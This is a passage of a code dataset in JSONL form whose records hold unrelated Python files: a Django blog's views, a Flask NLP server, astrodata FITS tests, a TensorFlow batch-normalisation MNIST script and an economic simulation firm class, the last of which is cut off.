net(imgs)\n # DeepLabv3+\n #masks_pred = net(imgs)\n # PSPNet\n masks_pred = net(imgs)\n\n pred = torch.sigmoid(masks_pred)\n pred = (pred > 0.5).float()\n\n for i in range(loader.batch_size):\n tot += compute_overlaps_masks(pred[i], true_masks[i])\n #print(compute_overlaps_masks(pred[i], true_masks[i]))\n pbar.update()\n \n return tot / (n_val*loader.batch_size)\n","sub_path":"miou_psp.py","file_name":"miou_psp.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"108962638","text":"#------------------------------------------------------\n# fvs_direction.py identifies the orientation of FVS node perturbations resulting in attractors in the goal cluster (successful perturbations)\n# \n# INPUTS:\n# 1. Basal states of randomly generated perturbations of FVS nodes\n# 2. A list of perturbations resulting in attractors in the goal cluster\n# 3. A list of FVS nodes\n#\n# OUTPUTS:\n# 1. 
A file with the frequency of each perturbation orientation (knocked-in, knocked-out, or no change) for the perturbations resulting in attractors in the goal cluster\n#------------------------------------------------------\n\nimport pandas as pd\nimport os\nimport sys\n\n\n###################### User Inputs: #####################\nsub = sys.argv[1] #File with names of perturbations of interest\nFCname = sys.argv[2] #Name of perturbed FVS set\n#########################################################\n\ndirname = os.path.dirname('virtual_screening/')\nbasal = pd.read_csv(os.path.join(dirname, 'basal_states.txt'), delim_whitespace = True, index_col = ['name']) #Read in FVS node perturbations \nsubset = pd.read_csv(os.path.join(dirname, sub), delim_whitespace = True, index_col = ['name']) #Read in list of successful perturbations\nfvs = pd.read_csv(os.path.join('inputfiles', FCname), index_col = ['name']) #Read in list of FVS nodes\n\n#Create dataframe with perturbation orientations for successful perturbations\ndf = basal.loc[basal.index.isin(subset.index), :] \ndf.columns = fvs.index\n\n#Create dataframe with frequency of orientation of each FVS node in successful perturbations\nfreq = pd.DataFrame(index = ['Knocked-in', 'Knocked-out', 'No_Change'], columns = fvs.index)\nfor node, col in df.iteritems():\n    col = col.tolist()\n    npert = len(col) #number of successful perturbations\n    up = col.count(1)\n    down = col.count(-1)\n    nc = col.count(0)\n    freq.loc['Knocked-in', node] = round(up/npert*100, 3)\n    freq.loc['Knocked-out', node] = round(down/npert*100,3)\n    freq.loc['No_Change', node] = round(nc/npert*100,3)\n\nprint(freq)\noutf = sub.split('.txt')[0] + '_fvsDir.txt'\nfreq.to_csv(os.path.join(dirname, outf), sep = \" \")\n\n#### Write out dataframe including number of nodes that must be perturbed (not no-change) in a successful perturbation:\ncount = pd.DataFrame(index = basal.index, columns = ['Number_of_Perturbed_Nodes'])\n \nfor pert, row in df.iterrows():\n    row = row.tolist()\n    nc = row.count(0)\n    npert = len(basal.columns) - nc\n    count.loc[pert, 'Number_of_Perturbed_Nodes'] = npert\ncount.to_csv(os.path.join(dirname, 'number_of_perturbed_nodes_' + sub), sep = \" \", index_label = 'name')\nprint(count.Number_of_Perturbed_Nodes.value_counts())\n","sub_path":"_site/_projects/project2/Network_Analysis/scripts/9_fvs_direction.py","file_name":"9_fvs_direction.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306606038","text":"'''\nCreated on 2015. 4. 
3.\n\n@author: bklim\n'''\n\nclass Monster(object):\n '''\n classdocs\n '''\n FirstColor = []\n SecondColor = []\n Attack = 0\n Heal = 0\n TwoWay = []\n RowAwake = []\n ColorAwake = []\n Hp = 0\n\n def __init__(self):\n '''\n Constructor\n '''\n pass\n \n def settings(self, fc, sc, at, he, tw, ra, ca, h):\n self.FirstColor = fc\n self.SecondColor = sc\n self.Attack = at\n self.Heal = he\n self.TwoWay = tw\n self.RowAwake = ra\n self.ColorAwake = ca\n self.Hp = h\n \n ","sub_path":"PDSolver/src/Monster.py","file_name":"Monster.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"202874474","text":"from MobileApps.libs.flows.android.smart.flow_container import FLOW_NAMES\nimport pytest\n\npytest.app_info = \"SMART\"\n\nclass Test_Suite_01_About_Hp_Smart(object):\n @pytest.fixture(scope=\"class\", autouse=\"true\")\n def class_setup(cls, request, android_smart_setup):\n cls = cls.__class__\n cls.driver, cls.fc = android_smart_setup\n\n # Define the flows\n cls.home = cls.fc.flow[FLOW_NAMES.HOME]\n cls.help_center = cls.fc.flow[FLOW_NAMES.HELP_CENTER]\n\n @pytest.fixture(scope=\"function\", autouse=\"true\")\n def function_setup(self, account_type):\n self.fc.reset_app()\n self.fc.set_hpid_account(a_type=account_type, claimable=True, ii_status=True if account_type == \"hp+\" else False)\n self.fc.load_smart_dashboard_help_center_about_hp_smart()\n\n @pytest.mark.parametrize(\"account_type\", [\"hp+\", \"ucde\"])\n def test_01_getting_to_know_smart(self, account_type):\n \"\"\"\n Description:\n 1. Load to Home screen with an hp+ account\n 2. Click on Account button\n 3. Click on Menu button\n 4. Click on Help Center\n 5. Click on About HP Smart item\n 6. Click on Getting to Know HP Smart\n\n Expected Result:\n 5. Verify About HP Smart page\n \"\"\"\n self.help_center.click_link_on_help_center_screen(self.help_center.GETTING_TO_KNOW_HP_SMART)\n self.help_center.verify_getting_to_know_hp_smart()\n\n @pytest.mark.parametrize(\"account_type\", [\"hp+\", \"ucde\"])\n def test_02_starting_off(self, account_type):\n \"\"\"\n Description:\n 1. Load to Home screen with an hp+ account\n 2. Click on Account button\n 3. Click on Menu button\n 4. Click on Help Center\n 5. Click on About HP Smart item\n 6. Click on Starting Off\n\n Expected Result:\n 5. Verify Starting Off page\n \"\"\"\n self.help_center.click_link_on_help_center_screen(self.help_center.STARTING_OFF)\n self.help_center.verify_starting_off()\n\n @pytest.mark.parametrize(\"account_type\", [\"hp+\", \"ucde\"])\n def test_03_sharing_files(self, account_type):\n \"\"\"\n Description:\n 1. Load to Home screen with an hp+ account\n 2. Click on Account button\n 3. Click on Menu button\n 4. Click on Help Center\n 5. Click on About HP Smart item\n 6. Click on Sharing Files\n\n Expected Result:\n 5. 
Verify Sharing Files page\n \"\"\"\n self.help_center.click_link_on_help_center_screen(self.help_center.SHARING_FILES)\n self.help_center.verify_sharing_file()","sub_path":"tests/android/smart/functionality/smart_dashboard_help_center/test_suite_01_about_hp_smart.py","file_name":"test_suite_01_about_hp_smart.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"610165216","text":"from django.views import generic\nfrom django.db.models import Q\nfrom .models import Post\nfrom .forms import PostSerachForm\n\nclass BasePostListView(generic.ListView):\n \"\"\"Shared logic for post list views\"\"\"\n model = Post\n context_object_name = 'posts' # if omitted, the queryset is passed to the template as _list (post_list)\n paginate_by = 10\n\n def get_queryset(self):\n \"\"\"Fetch all published posts\"\"\"\n queryset = Post.objects.filter(public_flag='True').order_by('-created_date')\n return queryset\n\n\nclass IndexPostListView(BasePostListView):\n \"\"\"Post list view\"\"\"\n\n def get_queryset(self):\n \"\"\"Filter posts by search keyword\"\"\"\n form = PostSerachForm(self.request.GET)\n form.is_valid()\n keyword = form.cleaned_data['keyword']\n queryset = super().get_queryset()\n if keyword:\n for word in keyword.split():\n queryset = queryset.filter(\n Q(title__icontains=word) | Q(body__icontains=word))\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"Used to control the header and breadcrumbs\"\"\"\n form = PostSerachForm(self.request.GET)\n form.is_valid()\n keyword = form.cleaned_data['keyword']\n context = super().get_context_data(**kwargs)\n if keyword:\n context[\"output_type\"] = \"search\"\n context[\"search_keyword\"] = keyword\n return context\n\n\nclass CategoryPostListView(BasePostListView):\n \"\"\"Post list view filtered by category\"\"\"\n\n def get_queryset(self):\n \"\"\"Filter posts by category\"\"\"\n queryset = super().get_queryset()\n category_filter = self.kwargs[\"category\"]\n if self.kwargs[\"category\"]:\n queryset = queryset.filter(\n Q(main_category__name=category_filter) |\n Q(sub_categories__name=category_filter)).distinct()\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"Used to control the header and breadcrumbs\"\"\"\n context = super().get_context_data(**kwargs)\n context['output_type'] = \"category\"\n context['target_category'] = self.kwargs[\"category\"]\n return context\n\n\nclass PostDetailView(generic.DetailView):\n \"\"\"Post detail view\"\"\"\n model = Post\n slug_field = 'permalink'\n slug_url_kwarg = 'permalink'\n\n def get_context_data(self, **kwargs):\n \"\"\"Fetch the previous and next posts\"\"\"\n context = super().get_context_data(**kwargs)\n try:\n post = Post.objects.get(permalink=self.kwargs[\"permalink\"])\n prev_post = post.get_previous_by_created_date()\n except Post.DoesNotExist:\n prev_post = None\n context['prev_post'] = prev_post\n try:\n post = Post.objects.get(permalink=self.kwargs[\"permalink\"])\n next_post = post.get_next_by_created_date()\n except Post.DoesNotExist:\n next_post = None\n context['next_post'] = next_post\n\n return context\n","sub_path":"myblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158293732","text":"from flask import Flask\nfrom flask import request\n\n# create flask app\napp = Flask(__name__)\n\n# import spacy for nlp\nimport spacy_nlp\n\n# import wordnet for synsets\nfrom nltk.corpus import wordnet as wn\n\n# import mordecai for geoparsing\nfrom mordecai import Geoparser\ngeo = Geoparser()\n\nimport json\n\n\n@app.route('/')\ndef hello():\n return \"Hello 
World!\\n This python server is used for processing query logs. Routes include '/test_route/', '/spacy/', '/nltk/' '/mordecai/'\"\n\n\n@app.route('/test_route/')\ndef thing():\n return \"\"\"this is a test route! To parse a query, use 'http://127.0.0.1:5000/spacy/?query_string=...' \\n\n There are other providers like nltk. This is accessable at http://127.0.0.1:5000/nltk/?query_string=...\"\"\"\n\n\n@app.route(\"/spacy/\")\ndef parse_text():\n try:\n # pull off query string arg from url\n query_string = request.args.get('query_string')\n\n # nlp parse string using spaCy\n string_details = spacy_nlp.parse(query_string)\n\n # convert to JSON\n as_json = json.dumps(string_details)\n return as_json\n except:\n print('there was an exception to route /spacy/')\n\n@app.route(\"/nltk/synsets/\")\ndef nltk():\n try:\n # pull off query string arg from url\n query_string = request.args.get('query_string')\n\n res = wn.synsets(query_string)\n res = str(res)\n return res\n\n except:\n print('there was an exception running /wn/')\n\n\n@app.route(\"/mordecai/\")\ndef mordecai_geoparser():\n try:\n # pull off query string arg from url\n query_string = request.args.get('query_string')\n\n # geoparse query string\n geoparsed = geo.geoparse(query_string)\n\n geoparsed = str(geoparsed)\n\n return geoparsed\n except:\n print('there was an exception running /mordecai/')\n\n\nif __name__ == '__main__':\n app.run(threaded=True)","sub_path":"src/text_processing/nlp/python_server.py","file_name":"python_server.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"89950560","text":"import glob\nimport os\n\nimport numpy as np\nimport pytest\nfrom astropy.io import fits\nfrom astropy.table import Table\n\nimport astrodata\nfrom astrodata.testing import download_from_archive\n\ntest_files = [\n \"N20160727S0077.fits\", # NIFS DARK\n \"N20170529S0168.fits\", # GMOS-N SPECT\n \"N20190116G0054i.fits\", # GRACES SPECT\n \"N20190120S0287.fits\", # NIRI IMAGE\n \"N20190206S0279.fits\", # GNIRS SPECT XD\n \"S20150609S0023.fits\", # GSAOI DARK\n \"S20170103S0032.fits\", # F2 IMAGE\n \"S20170505S0031.fits\", # GSAOI FLAT\n \"S20170505S0095.fits\", # GSAOI IMAGE\n \"S20171116S0078.fits\", # GMOS-S MOS NS\n \"S20180223S0229.fits\", # GMOS IFU ACQUISITION\n \"S20190213S0084.fits\", # F2 IMAGE\n]\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_file_exists(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n assert os.path.exists(os.path.join(path_to_inputs, fname)), \\\n \"File does not exists: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_can_open_fits_file(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(os.path.join(path_to_inputs, fname))\n\n assert isinstance(ad, astrodata.fits.AstroDataFits), \\\n \"Could not open file: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_basename_is_properly_set(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n basename = os.path.basename(fname)\n\n assert ad.filename == basename, \\\n \".filename property does not match input file name for file \" \\\n 
\"{:s}\".format(basename)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_can_add_and_del_extension(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n original_size = len(ad)\n\n ourarray = np.array([(1, 2, 3), (11, 12, 13), (21, 22, 23)])\n ad.append(ourarray)\n\n assert len(ad) == (original_size + 1), \\\n \"Could not append extension to ad: {:s}\".format(fname)\n\n del ad[original_size]\n\n assert len(ad) == original_size, \\\n \"Could not remove extension from ad: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_extension_data_is_an_array(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n assert type(ad[0].data) == np.ndarray, \\\n \"Expected data type {} for {} but found {}\".format(\n np.ndarray, fname, type(ad[0].data))\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_iterate_over_extensions(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n metadata = (('SCI', 1), ('SCI', 2), ('SCI', 3))\n\n for ext, md in zip(ad, metadata):\n assert ext.hdr['EXTNAME'] == md[0], \\\n \"Mismatching EXTNAME for file {:s}\".format(fname)\n assert ext.hdr['EXTVER'] == md[1], \\\n \"Mismatching EXTVER for file {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_slice_multiple(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n metadata = ('SCI', 2), ('SCI', 3)\n\n try:\n slc = ad[1, 2]\n\n except IndexError:\n assert len(ad) == 1\n\n else:\n assert len(slc) == 2\n for ext, md in zip(slc, metadata):\n assert (ext.hdr['EXTNAME'], ext.hdr['EXTVER']) == md, \\\n \"Test failed for file: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_slice_single(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n try:\n metadata = ('SCI', 2)\n ext = ad[1]\n\n except IndexError:\n assert len(ad) == 1, \\\n \"Mismatching number of extensions for file {:s}\".format(\n fname)\n\n else:\n assert ext.is_single, \\\n \"Mismatching number of extensions for file {:s}\".format(\n fname)\n\n assert ext.hdr['EXTNAME'] == metadata[0], \\\n \"Mismatching EXTNAME for file {:s}\".format(fname)\n\n assert ext.hdr['EXTVER'] == metadata[1], \\\n \"Mismatching EXTVER for file {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_iterate_over_single_slice(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n metadata = ('SCI', 1)\n\n for ext in ad[0]:\n assert (ext.hdr['EXTNAME'], ext.hdr['EXTVER']) == metadata, \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_slice_negative(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n assert ad.data[-1] is ad[-1].data, \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", 
test_files)\ndef test_set_a_keyword_on_phu(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n ad.phu['DETECTOR'] = 'FooBar'\n ad.phu['ARBTRARY'] = 'BarBaz'\n\n assert ad.phu['DETECTOR'] == 'FooBar', \\\n \"Assertion failed for file: {}\".format(fname)\n\n assert ad.phu['ARBTRARY'] == 'BarBaz', \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_remove_a_keyword_from_phu(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n if ad.instrument().upper() not in ['GNIRS', 'NIRI', 'F2']:\n del ad.phu['DETECTOR']\n assert 'DETECTOR' not in ad.phu, \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_writes_to_new_fits(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n test_file_location = os.path.join(path_to_inputs, 'temp.fits')\n\n if os.path.exists(test_file_location):\n os.remove(test_file_location)\n\n ad.write(test_file_location)\n assert os.path.exists(test_file_location)\n\n os.remove(test_file_location)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_can_overwrite_existing_file(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n test_file_location = os.path.join(path_to_inputs, 'temp_overwrite.fits')\n\n if os.path.exists(test_file_location):\n os.remove(test_file_location)\n\n ad.write(test_file_location)\n\n assert os.path.exists(test_file_location)\n\n adnew = astrodata.open(test_file_location)\n adnew.write(overwrite=True)\n\n # erasing file for cleanup\n os.remove(test_file_location)\n\n\ndef test_can_make_and_write_ad_object(path_to_inputs):\n # Creates data and ad object\n phu = fits.PrimaryHDU()\n pixel_data = np.random.rand(100, 100)\n\n hdu = fits.ImageHDU()\n hdu.data = pixel_data\n\n ad = astrodata.create(phu)\n ad.append(hdu, name='SCI')\n\n # Write file and test it exists properly\n test_file_location = os.path.join(\n path_to_inputs, 'created_fits_file.fits')\n\n if os.path.exists(test_file_location):\n os.remove(test_file_location)\n ad.write(test_file_location)\n\n assert os.path.exists(test_file_location)\n # Opens file again and tests data is same as above\n\n adnew = astrodata.open(test_file_location)\n assert np.array_equal(adnew[0].data, pixel_data)\n os.remove(test_file_location)\n\n\ndef test_can_append_table_and_access_data():\n my_astropy_table = Table(list(np.random.rand(2, 100)),\n names=['col1', 'col2'])\n\n phu = fits.PrimaryHDU()\n ad = astrodata.create(phu)\n astrodata.add_header_to_table(my_astropy_table)\n\n ad.append(my_astropy_table, name='BOB')\n\n print(ad.info())\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_set_a_keyword_on_phu_deprecated(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n try:\n with pytest.raises(AssertionError):\n ad.phu.DETECTOR = 'FooBar'\n ad.phu.ARBTRARY = 'BarBaz'\n\n assert ad.phu.DETECTOR == 'FooBar'\n assert ad.phu.ARBTRARY == 'BarBaz'\n assert ad.phu['DETECTOR'] == 'FooBar'\n\n except KeyError as e:\n\n # Some instruments don't have DETECTOR as a keyword\n if e.args[0] == 
\"Keyword 'DETECTOR' not found.\":\n pass\n else:\n raise KeyError\n\n\n# Regression:\n# Make sure that references to associated\n# extension objects are copied across\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_do_arith_and_retain_features(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n ad[0].NEW_FEATURE = np.array([1, 2, 3, 4, 5])\n ad2 = ad * 5\n\n np.testing.assert_array_almost_equal(\n ad[0].NEW_FEATURE, ad2[0].NEW_FEATURE)\n\n\ndef test_update_filename():\n phu = fits.PrimaryHDU()\n ad = astrodata.create(phu)\n ad.filename = 'myfile.fits'\n\n # This will also set ORIGNAME='myfile.fits'\n ad.update_filename(suffix='_suffix1')\n assert ad.filename == 'myfile_suffix1.fits'\n\n ad.update_filename(suffix='_suffix2', strip=True)\n assert ad.filename == 'myfile_suffix2.fits'\n\n ad.update_filename(suffix='_suffix1', strip=False)\n assert ad.filename == 'myfile_suffix2_suffix1.fits'\n\n ad.filename = 'myfile.fits'\n ad.update_filename(prefix='prefix_', strip=True)\n assert ad.filename == 'prefix_myfile.fits'\n\n ad.update_filename(suffix='_suffix', strip=True)\n assert ad.filename == 'prefix_myfile_suffix.fits'\n\n ad.update_filename(prefix='', suffix='_suffix2', strip=True)\n assert ad.filename == 'myfile_suffix2.fits'\n\n # Now check that updates are based on existing filename\n # (so \"myfile\" shouldn't appear)\n ad.filename = 'file_suffix1.fits'\n ad.update_filename(suffix='_suffix2')\n assert ad.filename == 'file_suffix1_suffix2.fits'\n\n # A suffix shouldn't have an underscore, so should assume that\n # \"file_suffix1\" is the root\n ad.update_filename(suffix='_suffix3', strip=True)\n assert ad.filename == 'file_suffix1_suffix3.fits'\n\n\n@pytest.mark.remote_data\ndef test_read_a_keyword_from_phu_deprecated():\n \"Test deprecated methods to access headers\"\n ad = astrodata.open(\n download_from_archive('N20110826S0336.fits', path='GMOS'))\n\n with pytest.raises(AttributeError):\n assert ad.phu.DETECTOR == 'GMOS + Red1'\n\n with pytest.raises(AttributeError):\n assert ad.hdr.CCDNAME == [\n 'EEV 9273-16-03', 'EEV 9273-20-04', 'EEV 9273-20-03'\n ]\n\n # and when accessing missing extension\n with pytest.raises(AttributeError):\n ad.ABC\n\n\nif __name__ == '__main__':\n pytest.main()\n","sub_path":"astrodata/tests/test_fits.py","file_name":"test_fits.py","file_ext":"py","file_size_in_byte":11723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565579626","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport sys\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"../MNIST_data\", one_hot=True)\n\nif len(sys.argv) != 2:\n print(\"USAGE : \",sys.argv[0],\" [seed number]\")\n sys.exit()\n\n\nmy_seed = int(sys.argv[1])\nfolder_name = sys.argv[1]\n\n\nnp.random.seed(my_seed)\n\n\nif not os.path.exists('BN_' + folder_name):\n os.makedirs('BN_' + folder_name)\n\n\nmini_batch_size = 64\nmax_iteration = 5000\nlearning_rate = 0.0001 \n\nepsilon = 1e-8\n\n\nX = tf.placeholder(tf.float32, shape=[None, 784])\nT = tf.placeholder(tf.float32, shape=[None, 10])\n\nW1 = tf.Variable(tf.random_normal(shape = [784, 3072], mean = 0,stddev = 0.1,seed = my_seed))\n#b1 = tf.Variable(tf.random_normal(shape = [512], mean = 0,stddev = 0.1,seed = 2*my_seed))\nscale1 = tf.Variable(tf.ones([3072]))\nbeta1 = tf.Variable(tf.zeros([3072]))\n\nW2 = tf.Variable(tf.random_normal(shape 
= [3072, 3072], mean = 0,stddev = 0.1,seed = 3*my_seed))\n#b2 = tf.Variable(tf.random_normal(shape = [256], mean = 0,stddev = 0.1,seed = 4*my_seed))\nscale2 = tf.Variable(tf.ones([3072]))\nbeta2 = tf.Variable(tf.zeros([3072]))\n\nW3 = tf.Variable(tf.random_normal(shape = [3072, 10], mean = 0,stddev = 0.1,seed = 5*my_seed))\nb3 = tf.Variable(tf.random_normal(shape = [10], mean = 0,stddev = 0.1, seed = 6*my_seed))\n\n\nz2 = tf.matmul(X,W1)\n\nbatch_mean1, batch_var1 = tf.nn.moments(z2,[0])\n\nz2_hat = (z2 - batch_mean1)/tf.sqrt(batch_var1 + epsilon)\n\nBN2 = scale1*z2_hat + beta1 \n\n\na2 = tf.nn.relu(BN2)\n\n\nz3 = tf.matmul(a2,W2)\n\nbatch_mean2, batch_var2 = tf.nn.moments(z3,[0])\n\nz3_hat = (z3 - batch_mean2)/tf.sqrt(batch_var2 + epsilon)\n\nBN3 = scale2*z3_hat + beta2 \n\n\na3 = tf.nn.relu(BN3)\n\n\nz4 = tf.matmul(a3,W3) + b3\na4 = tf.nn.sigmoid(z4)\n\ny = a4\n\n\ncross_entropy = -tf.reduce_mean(T*tf.log(y + epsilon) +(1-T)*tf.log(1-y + epsilon ))\n\n\ntrain_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)\n\n\ncorrect_prediction = tf.equal(tf.arg_max(y,1),tf.arg_max(T,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\nsess = tf.Session(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True)))\nsess.run(tf.global_variables_initializer())\n\n\nmean1, mean2, mean3 = [], [], []\ntrain_error, train_accuracy = [], []\nvalidation_error, validation_accuracy = [],[]\n\ntest_input, test_label = mnist.test.next_batch(1000)\n\nfor i in range(max_iteration) :\n \n train_input, train_label = mnist.train.next_batch(mini_batch_size)\n\n res = sess.run([train_step,cross_entropy,accuracy],feed_dict = {X : train_input , T : train_label})\n train_error.append(res[1])\n train_accuracy.append(res[2])\n\n res2 = sess.run([cross_entropy,accuracy,BN2,BN3,z4],feed_dict = {X : test_input, T : test_label})\n validation_error.append(res2[0])\n validation_accuracy.append(res2[1])\n mean1.append(np.mean(res2[2],axis =0))\n mean2.append(np.mean(res2[3],axis =0))\n mean3.append(np.mean(res2[4],axis =0))\n if i % 100 == 0 :\n print(i, res[1], res[2], res2[0],res2[1])\n\n\n\n\nres3 = sess.run([W1,W2,W3])\n \nnp.savetxt(fname='BN_' + folder_name + '/train_error.txt',X=train_error,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/train_accuracy.txt',X=train_accuracy,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/validation_error.txt',X=validation_error,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/validation_accuracy.txt',X=validation_accuracy,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/mean1.txt',X=mean1,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/mean2.txt',X=mean2,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/mean3.txt',X=mean3,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/W1.txt',X=res3[0],fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/W2.txt',X=res3[1],fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/W3.txt',X=res3[2],fmt=\"%f\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Batch_Normalization/batch_normalization_for_test.py","file_name":"batch_normalization_for_test.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"361700446","text":"from firm import Firm\nfrom firm_action import FirmAction\nfrom firm_labormarket_action import FirmLaborMarketAction\nfrom firm_goodmarket_action import FirmGoodMarketAction\n\nimport math\nimport random\n\n\ndef change(new_value, old_value):\n return 
(new_value - old_value) / old_value if old_value > 0 else 0\n\n\ndef check_margin(salary, workers, expected):\n return 1 - salary * workers / expected > 0.05 if expected > 0 else 0\n\n\nclass MosesFirm(Firm):\n def __init__(self, id):\n super().__init__(id)\n self.salary = 200\n self.plan = 50 * self.efficiency_coefficient\n\n self.salary_change = 0\n self.price_change = 0\n self.sold_change = 0\n self.workers_change = 0\n self.plan_change = 0\n self.sales_change = 0\n self.profit_change = 0\n\n self.prev_salary = self.salary\n self.prev_price = self.price\n self.prev_sold = self.sold\n self.prev_plan = self.plan\n self.prev_workers = len(self.workers)\n self.prev_sales = self.sales\n self.prev_profit = self.profit\n\n self.exp_sales = 0.1\n self.exp_sold = 0.1\n\n self.expected = 0\n\n def decide_salary(self, stats):\n self.sales_change = change(self.sales, self.prev_sales)\n self.sold_change = change(self.sold, self.prev_sold)\n\n self.prev_sold = self.sold\n self.prev_sales = self.sales\n\n self.exp_sales = 0.5 * self.sales_change + 0.5 * stats.expected_sales_growth\n self.exp_sold = 0.5 * self.sold_change + 0.5 * stats.expected_sold_growth\n\n self.expected = (1 + self.exp_sales) * self.sales\n self.plan = (1 + self.exp_sold) * self.sold\n\n self.expected = self.expected if self.expected >= 0 else 0\n\n self.plan = (self.plan - self.stock) // self.efficiency_coefficient * self.efficiency_coefficient\n self.plan = self.plan if self.plan >= 0 else 0\n\n self.price = self.expected / self.plan if self.plan > 0 and self.expected > 0 else self.price\n self.salary = 0.95 * self.price * self.efficiency_coefficient\n\n while not (\n check_margin(self.salary, self.plan // self.efficiency_coefficient, self.expected)) and self.expected != 0:\n if self.profit >= 0:\n self.salary *= 0.95\n else:\n self.plan = self.plan // self.efficiency_coefficient - 1\n self.price = self.expected / self.plan if self.plan > 0 and self.expected > 0 else self.price\n self.salary = 0.95 * self.price * self.efficiency_coefficient\n self.plan = self.plan if self.plan >= 0 else 0\n self.offer_count = math.floor(self.plan / self.efficiency_coefficient) - len(self.workers)\n while self.offer_count < 0:\n self.fire_worker(random.choice(list(self.workers)))\n self.offer_count += 1\n if self.salary == 0:\n for worker in self.workers:\n self.fire_worker(worker)\n return FirmLaborMarketAction(self.offer_count, self.salary, [])\n\n def decide_price(self, stats):\n return FirmGoodMarketAction(self.stock, self.price, 